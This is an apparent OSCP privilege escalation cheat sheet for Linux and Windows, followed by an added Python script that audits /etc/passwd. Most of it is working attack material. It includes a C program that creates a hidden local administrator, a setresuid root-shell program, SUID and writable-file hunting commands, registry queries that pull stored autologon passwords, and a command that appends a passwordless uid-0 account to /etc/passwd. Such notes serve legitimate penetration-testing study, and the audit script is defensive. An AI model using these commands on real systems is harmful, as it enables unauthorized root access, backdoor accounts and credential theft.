OSCP

Privilege Escalation

GTFOBins
Linux elevation of privileges
Windows elevation of privileges
FuzzySecurity | Windows Privilege Escalation Fundamentals

Linux Privilege Escalation

    sudo -l
    Kernel Exploits
    OS Exploits
    Password reuse (mysql, .bash_history, 000-default.conf...)
    Known binaries with suid flag and interactive (nmap)
    Custom binaries with suid flag either using other binaries or with command execution
    Writable files owned by root that get executed (cronjobs)
    MySQL as root
    Vulnerable services (chkrootkit, logrotate)
    Writable /etc/passwd
    Readable .bash_history
    SSH private key
    Listening ports on localhost
    /etc/fstab
    /etc/exports
    /var/mail
    Process as other user (root) executing something you have permissions to modify
    SSH public key + Predictable PRNG
    apt update hooking (Pre-Invoke)
    Capabilities

Windows Privilege Escalation

    Kernel Exploits
    OS Exploits
    Pass The Hash
    Password reuse
    DLL hijacking (Path)
    Vulnerable services
    Writable services binaries path
    Unquoted services
    Listening ports on localhost
    Registry keys

Kernel Exploits

    https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
    https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
    http://www.fuzzysecurity.com/tutorials/16.html

Windows Add User

    #include <stdlib.h> /* system, NULL, EXIT_FAILURE */

    /* replace <username> and <password> before compiling; the result of system() is kept in i */
    int main ()
    {
        int i;
        i = system ("net user <username> <password> /add && net localgroup administrators <username> /add");
        return 0;
    }

SUID Change

SUID: set owner user ID.

    #include <unistd.h> /* setresuid */
    #include <stdlib.h> /* system */

    int main(void){
        /* set real, effective and saved uid to 0 so the spawned shell keeps them */
        setresuid(0, 0, 0);
        system("/bin/bash");
        return 0;
    }

Privilege Escalation:

    # Find binaries that will execute as the owner (SUID)
    find / -perm -u=s -type f 2>/dev/null

    # Find binaries that will execute as the group (SGID)
    find / -perm -g=s -type f 2>/dev/null

    # Find sticky-bit directories
    find / -perm -1000 -type d 2>/dev/null

    # SUID files, numeric form
    find / -perm -4000 2>/dev/null

    # Files writable by the current user
    find / -writable -type f 2>/dev/null

    # World-writable directories (adjust the pruned home path as needed)
    find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root

    # World-writable files
    find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null

    # Writable config files
    find /etc/ -writable -type f 2>/dev/null

    # Root-owned SUID files with a full listing
    find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null

Windows Exploit Suggester

    python2 windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quiet
    python windows-exploit-suggester.py --systeminfo systeminfo.txt --database 2018-11-25-mssb.xls

Windows Priv Escalation

    AlwaysInstallElevated
    Check if the following registry settings are set to "1"
    reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

    Autologon credentials stored under the Winlogon key
    reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

Basic Linux Enumeration

    # Distribution type & kernel version
    cat /etc/*release*
    uname -a
    rpm -q kernel
    dmesg | grep -i linux

    # Default writable directories
    /tmp
    /dev/shm

    # Search for passwords, e.g. within config.php
    grep -R 'password' config.php

    # Find possible other writable directories
    find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \; 2>/dev/null

    # Services running as the root user
    ps aux | grep root
    ps -ef | grep root

    # Installed applications
    ls -lah /usr/bin/
    ls -lah /sbin/
    dpkg -l
    rpm -qa
    ls -lah /var/cache/apt/archives/
    ls -lah /var/cache/yum/

    # Scheduled jobs
    crontab -l
    ls -la /etc/cron*
    ls -lah /var/spool/cron
    ls -la /etc/ | grep cron
    cat /etc/crontab
    cat /etc/anacrontab

    # Find pattern in file
    grep -rnw '/etc/passwd' -e 'root'

    # Sticky bit, SGID, SUID
    # Sticky bit
    find / -perm -1000 -type d 2>/dev/null

    # SGID (chmod 2000)
    find / -perm -g=s -type f 2>/dev/null

    # SUID (chmod 4000)
    find / -perm -u=s -type f 2>/dev/null
    find /* -user root -perm -4000 -print 2>/dev/null

    # SUID or SGID (parenthesised so that -type f applies to both tests)
    find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null

    # Add user to /etc/passwd and root group
    echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd

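Added example, not part of the original notes: a defender-side check for the kind of /etc/passwd entry the last command above creates. It parses passwd-format text (the sample below is constructed) and flags extra uid-0 accounts, non-root accounts with primary group 0, empty password fields, and hashes kept in /etc/passwd instead of /etc/shadow; the function names are my own.

```python
import os
from typing import List, Tuple

# Constructed sample in /etc/passwd format; the last entry is the one the note above appends.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
hodor::0:0:root:/root:/bin/bash
"""


def audit_passwd(text: str) -> List[Tuple[str, str]]:
    """Return (account, finding) pairs for suspicious entries in passwd-format text."""
    findings: List[Tuple[str, str]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed entry, expected 7 fields"))
            continue
        name, pw, uid, gid = fields[:4]
        if not (uid.isdigit() and gid.isdigit()):
            findings.append((name, "non-numeric uid or gid"))
            continue
        if int(uid) == 0 and name != "root":
            findings.append((name, "uid 0 account other than root"))
        if int(gid) == 0 and name != "root":
            findings.append((name, "primary group 0 on a non-root account"))
        if pw == "":
            findings.append((name, "empty password field (login without a password)"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            # anything else is a hash sitting in world-readable /etc/passwd rather than /etc/shadow
            findings.append((name, "password hash kept in /etc/passwd instead of /etc/shadow"))
    return findings


def audit_passwd_file(path: str = "/etc/passwd") -> List[Tuple[str, str]]:
    """Audit a real passwd file and also flag it if it is group- or world-writable."""
    findings = [(path, "file is group- or world-writable")] if os.stat(path).st_mode & 0o022 else []
    with open(path, encoding="utf-8", errors="replace") as fh:
        return findings + audit_passwd(fh.read())


if __name__ == "__main__":
    for account, finding in audit_passwd_file():
        print(f"{account}: {finding}")
```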